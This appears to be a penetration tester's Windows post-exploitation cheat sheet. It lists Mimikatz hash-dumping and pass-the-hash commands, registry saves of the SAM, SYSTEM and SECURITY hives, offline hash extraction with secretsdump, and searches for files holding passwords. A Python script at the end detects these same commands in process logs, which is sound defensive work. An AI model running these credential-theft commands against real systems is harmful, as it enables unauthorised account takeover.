Windows

Wednesday, June 24, 2020

8:39 AM


GUIDES

GitHub - emilyanncr/Windows-Post-Exploitation: Windows post-exploitation tools, resources, techniques and commands to use during post-exploitation phase of penetration test. Contributions are appreciated. Enjoy!

Mimikatz

Dump Hashes

privilege::debug
sekurlsa::logonPasswords

Pass-the-Hash (PTH)

privilege::debug
sekurlsa::pth /user

Commands

List PIDs with their task names

tasklist /svc

List connections

netstat -ano

Show files, including hidden ones

dir /a

The Windows equivalent of cat is type

type .\*

Dump Hashes

reg save hklm\SAM c:\sam
reg save hklm\SYSTEM c:\system
reg save hklm\SECURITY c:\security

Rebuild on Kali

secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL

Find Juicy Files

dir /b /s unattend.xml
dir /b /s web.config
dir /b /s sysprep.inf
dir /b /s sysprep.xml
dir /b /s *pass*
dir /b /s vnc.ini

findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini
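
Detection view of the registry hive saves and credential file searches listed above, as an added example that is not part of the original notes: it classifies process-creation command lines and rates each host. The rule names, severity labels and sample events are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed (host, command line) records, as Security event 4688 / Sysmon event 1 log them.
SAMPLE_EVENTS = [
    ("WS01", r"reg save hklm\SAM c:\sam"),
    ("WS01", r"reg  save HKLM\SYSTEM c:\system"),
    ("WS01", r"reg.exe save hklm\security c:\security"),
    ("WS02", r"reg save hklm\SOFTWARE\Vendor c:\backup.hiv"),
    ("WS02", r"cmd.exe /c dir /b /s unattend.xml"),
    ("WS02", r"findstr /si password *.xml"),
    ("WS03", r"findstr /i error build.log"),
]

# reg save of a whole credential hive (not a subkey beneath it)
HIVE_SAVE = re.compile(
    r"\breg(?:\.exe)?\s+save\s+(?:hklm|hkey_local_machine)"
    r"\\(sam|system|security)(?=\s|$)", re.I)
# recursive dir for files that commonly hold stored credentials
FILE_HUNT = re.compile(
    r"\bdir\b.*\s/s\b.*?(unattend\.xml|sysprep\.(?:inf|xml)|web\.config"
    r"|vnc\.ini|\*pass\*)", re.I)
CRED_GREP = re.compile(r"\bfindstr(?:\.exe)?\b.*\bpassword\b", re.I)

def classify(cmdline):
    """Return (rule, detail) for a command line, or None if no rule matches."""
    m = HIVE_SAVE.search(cmdline)
    if m:
        return ("hive_save", m.group(1).upper())
    m = FILE_HUNT.search(cmdline)
    if m:
        return ("credential_file_search", m.group(1).lower())
    if CRED_GREP.search(cmdline):
        return ("password_string_search", "findstr")
    return None

def triage(events):
    """Group hits per host. SAM saved together with SYSTEM rates high: SYSTEM
    holds the boot key needed to decrypt the SAM hashes offline."""
    hits = defaultdict(list)
    for host, cmdline in events:
        hit = classify(cmdline)
        if hit:
            hits[host].append(hit)
    report = {}
    for host, found in hits.items():
        hives = {detail for rule, detail in found if rule == "hive_save"}
        report[host] = ("high" if {"SAM", "SYSTEM"} <= hives else "medium", found)
    return report
```

Command-line matching only works where process creation is logged with command lines included, so treat it as one signal alongside file-creation and registry-access telemetry.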